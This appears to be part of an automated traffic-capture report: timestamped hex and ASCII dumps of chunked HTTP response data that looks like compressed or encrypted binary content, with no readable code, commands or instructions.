                                                                                                                                                                                                          Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC160INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC160INData Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93
                                                                                                                                                                                                          Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC168INData Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62
                                                                                                                                                                                                          Data Ascii: Btp}|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s|Ur\m|'&bA@l=VM%(b
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC176INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC176INData Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0
                                                                                                                                                                                                          Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E|'4za
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC184INData Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46
                                                                                                                                                                                                          Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC192INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC192INData Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45
                                                                                                                                                                                                          Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC200INData Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28
                                                                                                                                                                                                          Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC208INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC208INData Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73
                                                                                                                                                                                                          Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4w*S$4zS)R(kD]B5t|X<hxT/I3*E1,e1E7m-:bA10\\pls
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC216INData Raw: e8 a8 dc cb 99 23 d2 8d dd 6b 23 fb 17 02 05 19 17 ac d7 ea 11 1d 7f 14 b3 9f be 84 71 50 09 9e aa 59 3c e9 7c 05 29 60 63 73 4e e3 1f 24 19 46 6b 98 a2 a7 31 13 3c 4c 7f b5 e9 b2 7b 0f 09 e9 05 67 75 9c 2f 20 c3 a6 74 e1 35 6e 32 43 34 0c b8 a9 2e 33 a1 2c be ac d8 e9 0d bc 18 77 48 23 ee 4d 1b 43 39 e1 85 13 6a 3c 8e 98 f0 95 74 eb dc 09 96 06 10 40 89 d3 6b 00 a6 20 11 76 31 09 45 37 83 17 0c 7b 11 f5 3f 2b b6 26 65 73 97 0c 71 78 70 d2 fd a9 54 05 61 48 bf 0c 17 52 e6 14 21 a5 d7 78 da 72 61 07 95 37 0c 5b e4 7d 1b 1b 34 a5 41 43 b4 00 55 48 66 06 01 45 bb 65 75 72 bd 0c 17 52 ac 44 45 24 8c 86 33 0b 82 33 60 bc 52 de 7c fe 7b 0f 49 7c 11 de ba b3 35 5c 74 b7 46 4d 36 e6 15 66 04 f3 0c 62 6b 81 25 40 05 5a 03 26 45 b6 00 77 18 27 7e c6 c0 aa 05 46 71
                                                                                                                                                                                                          Data Ascii: #k#qPY<|)`csN$Fk1<L{gu/ t5n2C4.3,wH#MC9j<t@k v1E7{?+&esqxpTaHR!xra7[}4ACUHfEeurRDE$33`R|{I|5\tFM6fbk%@Z&Ew'~Fq
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC224INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC224INData Raw: 34 30 30 30 0d 0a 3d 3c f8 04 18 49 69 20 bd 8d 75 12 c8 b7 cc 2a ea ec d1 60 35 7a 1a ad 9c 7f cf aa c0 1c 4b 39 3f ec 35 46 01 1c 5a 74 71 bf 78 7d 78 10 74 21 51 71 f4 00 ba 26 4f 48 a6 20 11 46 60 3b 45 37 08 de 64 4f 35 f8 53 0f 4d 6c c0 37 11 48 a5 38 38 59 fb 2c 14 15 14 13 34 48 f2 0e 4f 34 63 e5 79 5e 67 68 c3 dc fe 92 4c 4f 51 31 be 67 55 56 bb c5 1b fa f0 0c 18 6d d2 29 8e ce 96 06 10 70 69 b5 6b 00 e0 28 11 42 4a 60 ca f5 c5 27 0c 53 79 ce bf e9 b6 26 65 73 88 59 71 78 57 1d 18 58 61 a8 15 66 04 c9 7f 46 5b b0 b8 67 06 fb 27 02 75 d3 5d fb 25 ea 11 1d 0f d0 5b c7 7f c8 71 50 41 3c b7 1d 18 50 bb 75 75 76 bf 04 17 5e e2 44 45 4c f2 3e 77 06 7d 37 44 53 c0 5a 53 39 3f ec 35 46 75 65 07 74 71 c0 f7 32 14 c7 bb 6d 75 76 78 c5 7e f2 9c e1 4a ae 8d
                                                                                                                                                                                                          Data Ascii: 4000=<Ii u*`5zK9?5FZtqx}xt!Qq&OH F`;E7dO5SMl7H88Y,4HO4cy^ghLOQ1gUVm)pik(BJ`'Sy&esYqxWXafF[g'u]%[qPA<Puuv^DEL>w}7DSZS9?5Fuetq2muvx~J
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC232INData Raw: 8b bb ec 64 35 f1 1e c6 b2 d6 6f 99 f9 82 66 f3 fe c2 77 eb 0c a3 b4 31 91 4d 6f a6 c3 a9 55 c1 52 29 71 a8 19 eb 2e e0 e0 11 d5 30 d6 38 ba 7e cf 55 60 e2 21 1d 0f a0 34 82 c8 07 11 5c fa 3d d8 1d b7 25 d8 65 da 07 d8 09 b8 34 63 48 ea 29 cd f3 17 02 65 df f8 eb d7 94 a2 7c d7 8f d7 62 41 82 50 9c 7a f3 f4 e3 3d 68 30 21 d0 07 dc da b7 62 6b bf fa 50 35 7a 92 4b ad 27 c5 26 c0 5e 60 39 3f a0 34 8a 7a 8b 3a 30 83 91 ea a7 c3 97 8f e2 1a 42 34 a1 e2 9c 94 ff a6 21 d1 20 0a 26 45 b6 01 b7 6f 42 9a c6 be 6e 95 48 2b bc ca b5 1c 9c 36 d8 49 8c 62 21 6b 42 f3 0d db 83 a4 00 61 e5 70 92 b5 1b 45 37 c5 16 c0 65 80 39 3f aa 04 8a 8e 55 08 5a f0 0d d4 8f d6 55 1e aa 14 aa bf 0d d7 8a 55 59 61 64 f2 3f bf 59 73 37 44 1b a3 b3 2d b4 7a d3 b0 07 ad 53 7d fd 35 5c 04
                                                                                                                                                                                                          Data Ascii: d5ofw1MoUR)q.08~U`!4\=%e4cH)e|bAPz=h0!bkP5zK'&^`9?4z:0B4! &EoBnH+6Ib!kBapE7e9?UZUUYad?Ys7D-zS}5\
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC240INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC240INData Raw: 34 30 30 30 0d 0a fb 2c 14 09 e3 d0 34 48 f4 26 4f 2c ed 84 35 7a 94 62 61 07 6e 93 28 6b 2d bc ff 5e 2e a5 05 67 15 8c f3 78 3c e0 d6 80 b3 8b 10 fb 8d 4a 36 f5 ea 44 45 44 b1 5e ac d9 c4 73 60 73 4b 3c 9a c6 be 67 55 42 b7 a6 7f 49 f0 0c 18 79 9c a6 ca de 96 06 10 6c 1b f1 6b 00 e0 28 11 5e 94 c3 cb 85 c5 27 0c 4f cd 02 b7 99 fa 26 65 67 be 30 55 58 d4 72 c4 96 cf 69 d8 47 b8 4b 32 62 23 8b b6 2c be b1 1b ad 19 13 14 1b ab af 25 66 77 d4 91 ae c8 0f 11 7c 24 30 b7 b5 74 eb dc 41 96 07 c4 b8 3f 62 6b 33 a1 ed 70 8e 94 63 55 9a 6b 53 28 ea 10 29 79 24 3b 98 80 2e 25 7b f0 0d 2c 38 c7 5e 99 aa 14 52 bd 0d df a5 2e 10 7a 81 35 7a d2 63 55 cf 85 ac d7 ea 20 29 ad 56 8e 9d c0 36 25 d9 fc d8 ab d2 79 78 b9 64 b9 85 71 a8 57 47 6b 00 d9 39 74 36 fd ad 08 d7 b3
                                                                                                                                                                                                          Data Ascii: 4000,4H&O,5zban(k-^.gx<J6DED^s`sK<gUBIylk(^'O&eg0UXriGK2b#,%fw|$0tA?bk3pcUkS()y$;.%{,8^R.z5zcU )V6%yxdqWGk9t6
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC248INData Raw: d8 63 96 bc 11 14 a3 26 aa b0 7b 0f 59 a5 05 67 15 54 71 78 3c b1 c0 be cf de e9 76 77 48 33 8b 7a ff 9e 9b f2 3f 98 43 4a 37 44 eb e3 00 4d 96 b4 66 ba 95 a0 68 ff a5 98 7b f6 98 d5 6d b9 6c 9a 83 59 83 39 a3 06 cb 67 e5 40 b1 86 1f 17 69 c5 26 e3 90 41 63 61 ec 34 a5 2e c0 35 74 1a 3d fb 0a b5 2d f7 99 68 cc d7 70 b8 2f ac f7 80 a5 df 7e da 73 82 f6 29 94 2a ea 10 fe 29 a0 71 62 86 06 fa d4 2c 78 3c 32 79 a7 12 a8 14 8d b5 3d fc 2e 97 04 61 a3 70 3d 57 4f 45 37 2f 16 6f 31 ec 7c 78 aa 34 25 13 a2 35 74 b0 15 7b 54 57 2d 77 3c d8 07 73 c9 46 25 7d 3e 68 64 be 3f 14 62 ce 7a 8b 17 a3 2e a2 b2 72 e0 f8 26 65 6b 7d fd 2d 5c 1c b1 de df 30 21 e9 e1 21 48 33 8b 38 fe 9e 9b 7d f1 16 c9 0d be 01 5c ef 2e 22 28 cf 2b 71 e3 04 04 b4 38 71 78 bd 1c 7b 06 78 de ae
                                                                                                                                                                                                          Data Ascii: c&{YgTqx<vwH3z?CJ7DMfh{mlY9g@i&Aca4.5t=-hp/~s)*)qb,x<2y=.ap=WOE7/o1|x4%5t{TW-w<sF%}>hd?bz.r&ek}-\0!!H38}\."(+q8qx{x
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC256INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC256INData Raw: 34 30 30 30 0d 0a 8c 9a 33 62 aa a5 41 62 35 7a 5f a7 c0 17 42 53 28 dd e6 c6 c0 aa fc 42 47 43 35 a1 c1 76 82 d8 89 48 36 21 51 46 38 6e 8c a5 ee 18 67 64 35 aa 56 26 45 bc c1 4b 2e 6b 65 b4 33 eb 72 ab c8 ce 2d 72 71 78 74 d4 71 fc b1 a4 49 44 34 48 96 81 94 ff a0 c1 2d 7c 53 26 43 b6 f1 4b 2e 6b 65 8f c5 32 71 a5 c4 53 33 74 71 c7 f9 59 3c e9 b5 31 57 42 34 77 b0 9d 94 81 e4 74 33 7a 53 cc b6 c8 bb d2 ad 7b 63 39 3f 49 ec 9d be 82 98 64 77 78 3c 5f bd dd 20 27 51 42 aa b0 ce 61 e0 85 71 62 35 7a da 62 61 77 0c d8 6d f3 2d b0 7b 0f 49 e9 c4 5b 33 74 71 f1 78 7d 0c e3 b5 01 57 42 34 c1 77 46 43 8b e4 4c 33 7a 53 af 01 13 64 bb 62 0d 9b c6 ba eb 7e e7 01 42 35 74 b6 3d bc 62 4f 68 30 99 2c 4e fa 8f b2 2f eb 71 94 14 cf f1 1e a6 b2 d6 fc 56 69 7b 61 f8 d5
                                                                                                                                                                                                          Data Ascii: 40003bAb5z_BS(BGC5vH6!QF8ngd5V&EK.ke3r-rqxtqID4H-|S&CK.ke2qS3tqY<1WB4wt3zS{c9?Idwx<_ 'QBaqb5zbawm-{I[3tqx}WB4wFCL3zSdb~B5t=bOh0,N/qVi{a
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC264INData Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b
                                                                                                                                                                                                          Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC272INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC272INData Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05
                                                                                                                                                                                                          Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk|1>ofu[i~,$"Qq`H ktcmS(Fr
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC280INData Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17
                                                                                                                                                                                                          Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC288INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC288INData Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb
                                                                                                                                                                                                          Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                                                                                                                                          Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC304INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
